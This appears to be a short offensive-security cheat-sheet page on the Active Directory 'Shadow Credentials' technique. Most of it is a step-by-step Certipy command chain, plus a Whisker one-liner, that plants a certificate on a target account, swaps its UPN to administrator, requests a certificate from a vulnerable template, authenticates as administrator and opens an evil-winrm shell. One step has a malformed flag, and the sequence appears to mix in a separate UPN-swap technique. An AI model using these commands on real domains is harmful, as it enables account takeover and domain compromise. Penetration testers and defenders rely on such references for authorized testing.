Shadow Credentials
Last modified: 2025-03-15
Shadow Credentials is an attack technique to take over Active Directory user/computer account by compromising msDS-KeyCredentialLink property of target objects.
Exploit
If the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD.
Using Certipy
# 1. Add a shadow certificate for the target user account
certipy shadow auto -u <user>@<target-ip> -hashes <nt-hash-of-user> -account <target-user>
# 2. Update the target account's UPN (User Principal Name) to "administrator"
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> -user <target-user> -upn administrator
# (Option) Find vulnerable template (check values for 'Template Name' and 'Certificate Authorities'. They will be used for the later commands)
certipy find -u <ca>@<target-ip> -hashes <nthash-of-ca> -stdout -vulnerable
# 3. Request a certificate for the target account using a vulnerable CA template
certipy req -u <target-user>@<target-ip> -hashes <nt-hash-of-target-user> -ca <ca> -template <template>
# 4. Restore the target account's UPN to its original value
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> user <target-user> -upn <target-user>@<target-ip>
# 5. Authenticate as the administrator using the obtained PFX certificate
certipy auth -pfx administrator.pfx -domain "example.local"
# 6. Establish a remote WinRM session as the administrator using their NTLM hash
evil-winrm -i <target-ip> -u administrator -H <nt-hash-of-administrator>
Using Whisker
Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute.
Whisker.exe add /target:john /domain:example.local